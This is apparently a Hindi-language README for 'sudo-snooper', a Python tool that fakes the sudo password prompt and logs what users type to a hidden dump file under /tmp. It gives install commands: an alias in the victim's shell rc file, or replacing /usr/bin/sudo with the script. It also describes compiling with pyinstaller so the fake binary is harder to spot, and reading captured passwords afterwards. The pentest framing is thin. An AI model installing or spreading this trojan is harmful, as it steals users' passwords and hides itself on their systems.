
एक Python स्क्रिप्ट जो मूल sudo बाइनरी की तरह व्यवहार करती है ताकि उपयोगकर्ताओं को उनके पासवर्ड दर्ज करने के लिए मूर्ख बनाया जा सके।
sudo-snooper मूल sudo बाइनरी की तरह काम करता है ताकि उपयोगकर्ताओं को उनके पासवर्ड दर्ज करने के लिए बेवकूफ बनाया जा सके।
यह उपयोगकर्ता को अपना sudo पासवर्ड दर्ज करने के लिए मूल प्रॉम्प्ट जैसा एक नकली प्रॉम्प्ट दिखाएगा।
यह पेनिट्रेशन टेस्ट या सुरक्षा मूल्यांकन में उपयोगी हो सकता है ताकि उपयोगकर्ता के ज्ञान का परीक्षण किया जा सके।
यह विकल्प करना आसान और अधिक पोर्टेबल है, हालांकि सावधान उपयोगकर्ताओं को यह अधिक ध्यान देने योग्य हो सकता है।
उपयोगकर्ता द्वारा उपयोग किए जा रहे शेल की .rc फ़ाइल (.bashrc, .zshrc आदि) को संपादित करें और निम्नलिखित जोड़ें:
alias sudo='python3 /path/to/sudo-snooper.py'
सुनिश्चित करें कि sudo-snooper.py में सही अनुमतियाँ हैं।
इस स्थापना विकल्प के लिए आपको रूट एक्सेस की आवश्यकता है
यह तभी उपयोगी होता है जब आपके पास पहले से रूट एक्सेस हो लेकिन किसी कारणवश /etc/shadow से हैश क्रैक नहीं कर पा रहे हों। मूलतः आप उपयोगकर्ता से उनका पासवर्ड फिश कर सकते हैं।
# mv /usr/bin/sudo /usr/bin/somename
sudo-snooper.py में ये बदलें:
dumpdir = "/tmp/.snooper"
dumpfile = "/tmp/.snooper/dump.txt"
sudo = 'sudo'
# install -dm755 sudo-snooper.py /usr/bin/sudo
python फ़ाइल को आवश्यक अनुमतियाँ दें
आप यहाँ फैंसी हो सकते हैं और उपयोगकर्ताओं के लिए एक गैर-पठनीय निष्पादन योग्य फ़ाइल बना सकते हैं, लेकिन मैं उसमें नहीं जा रहा हूँ। इसके लिए यहाँ दिए गए कुछ उत्तर देखें।
नोट: इसे स्थापित करने का थोड़ा अधिक विश्वसनीय तरीका pyinstaller का उपयोग करके इसे संकलित करना है ताकि जब file /usr/bin/sudo निष्पादित किया जाए तो यह python फ़ाइल के रूप में न दिखे।
Archlinux के तहत ऐसा करने के लिए: pyinstaller --onefile sudo-snooper.py काम करेगा। हालांकि कृपया ध्यान दें कि एक बार संकलित होने के बाद आप संकलित बाइनरी में पैरामीटर नहीं बदल पाएंगे।
एक बार स्थापित होने के बाद, sudo-snooper को सामान्य sudo की तरह ही कॉल किया जा सकता है।
उदाहरण के लिए, निम्नलिखित चलाने पर
sudo vim /etc/resolv.conf
sudo-snooper को कॉल किया जाएगा (यह मानते हुए कि यह ठीक से स्थापित है)।
यह उपयोगकर्ता पासवर्ड मांगेगा और फिर यदि पासवर्ड सही है तो वास्तविक sudo बाइनरी पर रीडायरेक्ट करके कमांड निष्पादित करेगा।
इसके बाद आप सेटिंग्स में डंप फ़ाइल को पढ़कर उपयोगकर्ता पासवर्ड प्राप्त कर सकते हैं।